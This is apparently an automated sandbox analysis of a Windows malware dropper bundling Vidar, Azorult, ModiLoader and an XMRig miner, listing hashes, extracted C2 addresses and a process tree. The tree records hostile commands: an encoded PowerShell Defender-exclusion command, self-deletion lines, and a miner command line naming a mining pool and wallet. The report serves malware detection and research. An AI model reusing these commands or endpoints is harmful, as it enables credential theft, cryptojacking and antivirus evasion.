Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
18-04-2023 10:02
Static task
static1
Behavioral task
behavioral1
Sample
b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe
Resource
win10v2004-20230220-en
General
-
Target
b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe
-
Size
685KB
-
MD5
66b8754b442f4b670f96017505518a72
-
SHA1
be14dae2c9ecc2227269053fa0829d57cc6052b4
-
SHA256
b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11
-
SHA512
e5120d94714d6a3180040b4a803f29de2378eaa0c5795e156e76a27ffd8ec16ada899d7c3d77d5a69267ee10e412fce6fd1625dee1549a9ec6646d0c751d1e8a
-
SSDEEP
12288:lnGZwDJEET9iY7ED3FxwMueDDn/gUZDArfzaEGcNmd:lnWZExiY4FN/TU7znc
Malware Config
Extracted
vidar
3.5
bbee3401930f10e95914ad2b6f71c79d
https://steamcommunity.com/profiles/76561199497218285
https://t.me/tg_duckworld
-
profile_id_v2
bbee3401930f10e95914ad2b6f71c79d
-
user_agent
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Vivaldi/3.7
Extracted
azorult
http://195.245.112.115/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
ModiLoader Second Stage 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2304-134-0x0000000003F80000-0x0000000003FAC000-memory.dmp modiloader_stage2 -
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1848-4751-0x0000000140000000-0x00000001407CD000-memory.dmp xmrig behavioral1/memory/1848-4754-0x0000000140000000-0x00000001407CD000-memory.dmp xmrig -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
80690903121234793488.exe80690903121234793488.exeb415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe85956929252184850106.exe80690903121234793488.exe85956929252184850106.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation 80690903121234793488.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation 80690903121234793488.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation 85956929252184850106.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation 80690903121234793488.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation 85956929252184850106.exe -
Executes dropped EXE 9 IoCs
Processes:
85956929252184850106.exe80690903121234793488.exe85956929252184850106.exe85956929252184850106.exe80690903121234793488.exe80690903121234793488.exe80690903121234793488.exe80690903121234793488.exe80690903121234793488.exepid process 1340 85956929252184850106.exe 1940 80690903121234793488.exe 4792 85956929252184850106.exe 4784 85956929252184850106.exe 4800 80690903121234793488.exe 4876 80690903121234793488.exe 1272 80690903121234793488.exe 1732 80690903121234793488.exe 4028 80690903121234793488.exe -
Loads dropped DLL 6 IoCs
Processes:
b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe85956929252184850106.exepid process 1804 b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe 1804 b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe 4784 85956929252184850106.exe 4784 85956929252184850106.exe 4784 85956929252184850106.exe 4784 85956929252184850106.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 6 IoCs
Processes:
b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe85956929252184850106.exe80690903121234793488.exe80690903121234793488.exe80690903121234793488.exe80690903121234793488.exedescription pid process target process PID 2304 set thread context of 1804 2304 b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe PID 1340 set thread context of 4784 1340 85956929252184850106.exe 85956929252184850106.exe PID 1940 set thread context of 4800 1940 80690903121234793488.exe 80690903121234793488.exe PID 4876 set thread context of 1272 4876 80690903121234793488.exe 80690903121234793488.exe PID 1272 set thread context of 1848 1272 80690903121234793488.exe AddInProcess.exe PID 1732 set thread context of 4028 1732 80690903121234793488.exe 80690903121234793488.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe85956929252184850106.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 85956929252184850106.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 85956929252184850106.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 4708 timeout.exe 4044 timeout.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe85956929252184850106.exe80690903121234793488.exe85956929252184850106.exepowershell.exepowershell.exepid process 1804 b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe 1804 b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe 1340 85956929252184850106.exe 1340 85956929252184850106.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 4784 85956929252184850106.exe 4784 85956929252184850106.exe 4768 powershell.exe 4768 powershell.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1284 powershell.exe 1284 powershell.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe 1272 80690903121234793488.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
85956929252184850106.exe80690903121234793488.exe80690903121234793488.exe80690903121234793488.exe80690903121234793488.exepowershell.exeAddInProcess.exe80690903121234793488.exepowershell.exedescription pid process Token: SeDebugPrivilege 1340 85956929252184850106.exe Token: SeDebugPrivilege 1940 80690903121234793488.exe Token: SeDebugPrivilege 1272 80690903121234793488.exe Token: SeDebugPrivilege 4800 80690903121234793488.exe Token: SeDebugPrivilege 4876 80690903121234793488.exe Token: SeDebugPrivilege 4768 powershell.exe Token: SeDebugPrivilege 1272 80690903121234793488.exe Token: SeLockMemoryPrivilege 1848 AddInProcess.exe Token: SeLockMemoryPrivilege 1848 AddInProcess.exe Token: SeDebugPrivilege 1732 80690903121234793488.exe Token: SeDebugPrivilege 1284 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
AddInProcess.exepid process 1848 AddInProcess.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exeb415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.execmd.exe85956929252184850106.exe80690903121234793488.execmd.exe85956929252184850106.execmd.exe80690903121234793488.execmd.exe80690903121234793488.exedescription pid process target process PID 2304 wrote to memory of 1804 2304 b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe PID 2304 wrote to memory of 1804 2304 b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe PID 2304 wrote to memory of 1804 2304 b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe PID 2304 wrote to memory of 1804 2304 b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe PID 1804 wrote to memory of 1340 1804 b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe 85956929252184850106.exe PID 1804 wrote to memory of 1340 1804 b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe 85956929252184850106.exe PID 1804 wrote to memory of 1340 1804 b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe 85956929252184850106.exe PID 1804 wrote to memory of 1940 1804 b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe 80690903121234793488.exe PID 1804 wrote to memory of 1940 1804 b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe 80690903121234793488.exe PID 1804 wrote to memory of 4600 1804 b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe cmd.exe PID 1804 wrote to memory of 4600 1804 b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe cmd.exe PID 1804 wrote to memory of 4600 1804 b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe cmd.exe PID 4600 wrote to memory of 4708 4600 cmd.exe timeout.exe PID 4600 wrote to memory of 4708 4600 cmd.exe timeout.exe PID 4600 wrote to memory of 4708 4600 cmd.exe timeout.exe PID 1340 wrote to memory of 4792 1340 85956929252184850106.exe 85956929252184850106.exe PID 1340 wrote to memory of 4792 1340 85956929252184850106.exe 85956929252184850106.exe PID 1340 wrote to memory of 4792 1340 85956929252184850106.exe 85956929252184850106.exe PID 1340 wrote to memory of 4784 1340 85956929252184850106.exe 85956929252184850106.exe PID 1340 wrote to memory of 4784 1340 85956929252184850106.exe 85956929252184850106.exe PID 1340 wrote to memory of 4784 1340 85956929252184850106.exe 85956929252184850106.exe PID 1340 wrote to memory of 4784 1340 85956929252184850106.exe 85956929252184850106.exe PID 1340 wrote to memory of 4784 1340 85956929252184850106.exe 85956929252184850106.exe PID 1340 wrote to memory of 4784 1340 85956929252184850106.exe 85956929252184850106.exe PID 1340 wrote to memory of 4784 1340 85956929252184850106.exe 85956929252184850106.exe PID 1340 wrote to memory of 4784 1340 85956929252184850106.exe 85956929252184850106.exe PID 1340 wrote to memory of 4784 1340 85956929252184850106.exe 85956929252184850106.exe PID 1940 wrote to memory of 3388 1940 80690903121234793488.exe cmd.exe PID 1940 wrote to memory of 3388 1940 80690903121234793488.exe cmd.exe PID 1940 wrote to memory of 4800 1940 80690903121234793488.exe 80690903121234793488.exe PID 1940 wrote to memory of 4800 1940 80690903121234793488.exe 80690903121234793488.exe PID 1940 wrote to memory of 4800 1940 80690903121234793488.exe 80690903121234793488.exe PID 1940 wrote to memory of 4800 1940 80690903121234793488.exe 80690903121234793488.exe PID 1940 wrote to memory of 4800 1940 80690903121234793488.exe 80690903121234793488.exe PID 1940 wrote to memory of 4800 1940 80690903121234793488.exe 80690903121234793488.exe PID 3388 wrote to memory of 1272 3388 cmd.exe 80690903121234793488.exe PID 3388 wrote to memory of 1272 3388 cmd.exe 80690903121234793488.exe PID 4784 wrote to memory of 1964 4784 85956929252184850106.exe cmd.exe PID 4784 wrote to memory of 1964 4784 85956929252184850106.exe cmd.exe PID 4784 wrote to memory of 1964 4784 85956929252184850106.exe cmd.exe PID 1964 wrote to memory of 4044 1964 cmd.exe timeout.exe PID 1964 wrote to memory of 4044 1964 cmd.exe timeout.exe PID 1964 wrote to memory of 4044 1964 cmd.exe timeout.exe PID 4876 wrote to memory of 1700 4876 80690903121234793488.exe cmd.exe PID 4876 wrote to memory of 1700 4876 80690903121234793488.exe cmd.exe PID 4876 wrote to memory of 1272 4876 80690903121234793488.exe 80690903121234793488.exe PID 4876 wrote to memory of 1272 4876 80690903121234793488.exe 80690903121234793488.exe PID 4876 wrote to memory of 1272 4876 80690903121234793488.exe 80690903121234793488.exe PID 4876 wrote to memory of 1272 4876 80690903121234793488.exe 80690903121234793488.exe PID 4876 wrote to memory of 1272 4876 80690903121234793488.exe 80690903121234793488.exe PID 4876 wrote to memory of 1272 4876 80690903121234793488.exe 80690903121234793488.exe PID 1700 wrote to memory of 4768 1700 cmd.exe powershell.exe PID 1700 wrote to memory of 4768 1700 cmd.exe powershell.exe PID 1272 wrote to memory of 1848 1272 80690903121234793488.exe AddInProcess.exe PID 1272 wrote to memory of 1848 1272 80690903121234793488.exe AddInProcess.exe PID 1272 wrote to memory of 1848 1272 80690903121234793488.exe AddInProcess.exe PID 1272 wrote to memory of 1848 1272 80690903121234793488.exe AddInProcess.exe PID 1272 wrote to memory of 1848 1272 80690903121234793488.exe AddInProcess.exe PID 1272 wrote to memory of 1848 1272 80690903121234793488.exe AddInProcess.exe PID 1272 wrote to memory of 1848 1272 80690903121234793488.exe AddInProcess.exe PID 1272 wrote to memory of 1848 1272 80690903121234793488.exe AddInProcess.exe PID 1272 wrote to memory of 1848 1272 80690903121234793488.exe AddInProcess.exe PID 1272 wrote to memory of 1848 1272 80690903121234793488.exe AddInProcess.exe PID 1272 wrote to memory of 1848 1272 80690903121234793488.exe AddInProcess.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe"C:\Users\Admin\AppData\Local\Temp\b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Users\Admin\AppData\Local\Temp\b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exeC:\Users\Admin\AppData\Local\Temp\b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe2⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\ProgramData\85956929252184850106.exe"C:\ProgramData\85956929252184850106.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1340 -
C:\ProgramData\85956929252184850106.exeC:\ProgramData\85956929252184850106.exe4⤵
- Executes dropped EXE
PID:4792
-
-
C:\ProgramData\85956929252184850106.exeC:\ProgramData\85956929252184850106.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4784 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "85956929252184850106.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\SysWOW64\timeout.exeC:\Windows\system32\timeout.exe 36⤵
- Delays execution with timeout.exe
PID:4044
-
-
-
-
-
C:\ProgramData\80690903121234793488.exe"C:\ProgramData\80690903121234793488.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==4⤵
- Suspicious use of WriteProcessMemory
PID:3388 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==5⤵PID:1272
-
-
-
C:\ProgramData\80690903121234793488.exeC:\ProgramData\80690903121234793488.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4800
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\b415a5cc8d0c1c960e7bc16bcb9351943b2c998f9430b1a1425b715754cc1e11.exe" & exit3⤵
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:4708
-
-
-
-
C:\Users\Admin\AppData\Roaming\80690903121234793488.exeC:\Users\Admin\AppData\Roaming\80690903121234793488.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4876 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==2⤵
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4768
-
-
-
C:\Users\Admin\AppData\Roaming\80690903121234793488.exeC:\Users\Admin\AppData\Roaming\80690903121234793488.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1272 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:14433 -u 4BBSeeCcr5wHcnUb8nD4AmBTU39d2dELQiDDTAamz1iWT7GjRdpsZi38VpMH48oY9VYwUdBgTCYshjQGRuu6mcoH1fE9LC5.worker1 -p x --algo rx/0 --cpu-max-threads-hint=503⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1848
-
-
-
C:\Users\Admin\AppData\Roaming\80690903121234793488.exeC:\Users\Admin\AppData\Roaming\80690903121234793488.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1732 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==2⤵PID:1108
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1284
-
-
-
C:\Users\Admin\AppData\Roaming\80690903121234793488.exeC:\Users\Admin\AppData\Roaming\80690903121234793488.exe2⤵
- Executes dropped EXE
PID:4028
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.3MB
MD5d48900504c4def0ee34e5239e2e55bab
SHA1902b1d617e342800666573cd5c145e68905803e2
SHA2561ff771de93f1b7a1824949621e743f0207b199b96151fb288474a7e8a2435e1d
SHA512f341814a73c8929c83d4855a1c60019958b5f98dc391e3127369c415164fc01b4ebbdb76b7fbe28d5f3eaa38923bb3cca55b1c2816e675d3ed01f5c6ddc10441
-
Filesize
2.3MB
MD5d48900504c4def0ee34e5239e2e55bab
SHA1902b1d617e342800666573cd5c145e68905803e2
SHA2561ff771de93f1b7a1824949621e743f0207b199b96151fb288474a7e8a2435e1d
SHA512f341814a73c8929c83d4855a1c60019958b5f98dc391e3127369c415164fc01b4ebbdb76b7fbe28d5f3eaa38923bb3cca55b1c2816e675d3ed01f5c6ddc10441
-
Filesize
2.3MB
MD5d48900504c4def0ee34e5239e2e55bab
SHA1902b1d617e342800666573cd5c145e68905803e2
SHA2561ff771de93f1b7a1824949621e743f0207b199b96151fb288474a7e8a2435e1d
SHA512f341814a73c8929c83d4855a1c60019958b5f98dc391e3127369c415164fc01b4ebbdb76b7fbe28d5f3eaa38923bb3cca55b1c2816e675d3ed01f5c6ddc10441
-
Filesize
2.3MB
MD5d48900504c4def0ee34e5239e2e55bab
SHA1902b1d617e342800666573cd5c145e68905803e2
SHA2561ff771de93f1b7a1824949621e743f0207b199b96151fb288474a7e8a2435e1d
SHA512f341814a73c8929c83d4855a1c60019958b5f98dc391e3127369c415164fc01b4ebbdb76b7fbe28d5f3eaa38923bb3cca55b1c2816e675d3ed01f5c6ddc10441
-
Filesize
1.7MB
MD5b894d22ac063a70b4194faceef6092e7
SHA1e367565d048d9458b9604b7cde12dc3acb7c95f0
SHA2567d64894e50ef558d6e893764ea7a672aa52feacd819e1986b552c85b6a4f985f
SHA512b1716970e59329ad512af0ed9711c197951d8a67bfed379e6a4c11cc7224b14043a72e99c92813d927e04ac96ecf1bbf54d1470acde24b69f8ea3f2dc5bad2c9
-
Filesize
1.7MB
MD5b894d22ac063a70b4194faceef6092e7
SHA1e367565d048d9458b9604b7cde12dc3acb7c95f0
SHA2567d64894e50ef558d6e893764ea7a672aa52feacd819e1986b552c85b6a4f985f
SHA512b1716970e59329ad512af0ed9711c197951d8a67bfed379e6a4c11cc7224b14043a72e99c92813d927e04ac96ecf1bbf54d1470acde24b69f8ea3f2dc5bad2c9
-
Filesize
1.7MB
MD5b894d22ac063a70b4194faceef6092e7
SHA1e367565d048d9458b9604b7cde12dc3acb7c95f0
SHA2567d64894e50ef558d6e893764ea7a672aa52feacd819e1986b552c85b6a4f985f
SHA512b1716970e59329ad512af0ed9711c197951d8a67bfed379e6a4c11cc7224b14043a72e99c92813d927e04ac96ecf1bbf54d1470acde24b69f8ea3f2dc5bad2c9
-
Filesize
1.7MB
MD5b894d22ac063a70b4194faceef6092e7
SHA1e367565d048d9458b9604b7cde12dc3acb7c95f0
SHA2567d64894e50ef558d6e893764ea7a672aa52feacd819e1986b552c85b6a4f985f
SHA512b1716970e59329ad512af0ed9711c197951d8a67bfed379e6a4c11cc7224b14043a72e99c92813d927e04ac96ecf1bbf54d1470acde24b69f8ea3f2dc5bad2c9
-
Filesize
1.7MB
MD5b894d22ac063a70b4194faceef6092e7
SHA1e367565d048d9458b9604b7cde12dc3acb7c95f0
SHA2567d64894e50ef558d6e893764ea7a672aa52feacd819e1986b552c85b6a4f985f
SHA512b1716970e59329ad512af0ed9711c197951d8a67bfed379e6a4c11cc7224b14043a72e99c92813d927e04ac96ecf1bbf54d1470acde24b69f8ea3f2dc5bad2c9
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
1KB
MD5cbe207895aa962105ca913568f7d2135
SHA1c62bcc9aac6f6ad0b14457d3d51c0a474528b106
SHA256bd468d112dd92eab9177b172cb46016d96c6d85fe567734852f8c07733c14a24
SHA5123a93a75b1c3a93d8466a7b2f5b0433805d7055e829834203b3b6ae48ecb899f3aaf68610057a0ce0f9a29647cd7c6577dcb4c89124dc368e91f5866a5dbf1e44
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
944B
MD523399bfea6522b82d0bbd88fa193738f
SHA158568080e17f3222614dde93644f596f4d72d916
SHA2562cde2268fa5a40e960fb07c78bf8ebec92b27d0c9b2da495cc817353cbf117a4
SHA5126a18b5f566700c59f19853c831a32bc24b96ed884c2a7ba65c37b18849f2a0e0eb9cc762726081abe759bf82bce66d451a440636114c708fae2ebf76592d322b
-
Filesize
135KB
MD59e682f1eb98a9d41468fc3e50f907635
SHA185e0ceca36f657ddf6547aa0744f0855a27527ee
SHA256830533bb569594ec2f7c07896b90225006b90a9af108f49d6fb6bebd02428b2d
SHA512230230722d61ac1089fabf3f2decfa04f9296498f8e2a2a49b1527797dca67b5a11ab8656f04087acadf873fa8976400d57c77c404eba4aff89d92b9986f32ed
-
Filesize
429KB
MD5109f0f02fd37c84bfc7508d4227d7ed5
SHA1ef7420141bb15ac334d3964082361a460bfdb975
SHA256334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA51246eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39
-
Filesize
1.2MB
MD5556ea09421a0f74d31c4c0a89a70dc23
SHA1f739ba9b548ee64b13eb434a3130406d23f836e3
SHA256f0e6210d4a0d48c7908d8d1c270449c91eb4523e312a61256833bfeaf699abfb
SHA5122481fc80dffa8922569552c3c3ebaef8d0341b80427447a14b291ec39ea62ab9c05a75e85eef5ea7f857488cab1463c18586f9b076e2958c5a314e459045ede2
-
Filesize
81KB
MD57587bf9cb4147022cd5681b015183046
